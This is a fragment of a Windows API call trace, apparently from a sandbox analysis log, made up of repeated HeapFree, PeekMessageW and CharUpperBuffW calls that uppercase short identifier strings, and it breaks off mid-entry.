[0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.104] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.104] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0260.107] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.107] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.107] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.107] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.107] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.108] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.108] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.109] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.109] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.109] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.109] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0260.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.112] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.112] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.112] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0260.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.113] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.113] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.113] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.113] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.113] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.114] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.114] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0260.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.116] HeapFree (in: 